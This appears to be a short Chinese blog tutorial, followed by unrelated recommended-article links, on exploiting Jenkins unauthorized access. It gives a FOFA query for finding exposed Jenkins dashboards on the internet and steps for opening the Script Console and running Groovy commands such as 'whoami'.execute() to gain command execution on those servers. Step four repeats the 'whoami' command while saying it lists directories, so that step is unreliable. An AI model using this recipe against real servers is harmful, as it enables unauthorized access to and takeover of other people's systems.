【Jenkins未授权访问漏洞 】

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

第一步:使用fofa语句搜索

搜索语句:

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

一个一个搜索,直到出现 Manage Jenkins,在打开的URL中...点击 Manage Jenkins

Scritp Console 再执行以下命令.

第二步:点进去后,页面往下翻看到Scritp Console------点击。

第三步:执行命令,查看当前用户名

println "whoami".execute().text

如下图就是执行中

第四步:执行命令,查看目录

println "whoami".execute().text

相关推荐
arbboter10 分钟前
【自动化】深入浅出UIAutomationClient:C#桌面自动化实战指南
运维·c#·自动化·inspect·uiautomation·uia·桌面自动化
二进制_博客31 分钟前
给CentOS的虚拟机扩容
linux·运维·centos
千钰v38 分钟前
Tcpdump: The Basics Tcpdump 基础
linux·运维·网络·tcpdump·tryhackme
kk5791 小时前
【Ubuntu】sudo apt update出现E :仓库***没有Release文件
linux·运维·ubuntu
belldeep1 小时前
Win10 上 Debian 12 如何安装 Redis ?
运维·redis·debian
Don't Look Down1 小时前
Rustdesk server docker-compose 一键搭建教程
运维·docker·容器
程序leo源1 小时前
Linux_基础指令(二)
android·linux·运维·服务器·青少年编程
葵花日记2 小时前
LINUX--编译器gcc/g++
linux·运维·服务器
光路科技3 小时前
光路科技将携工控四大产品亮相工博会,展示工业自动化新成果
运维·科技·自动化
PAQQ4 小时前
解决 ubuntu 重启串口号变化
linux·运维·ubuntu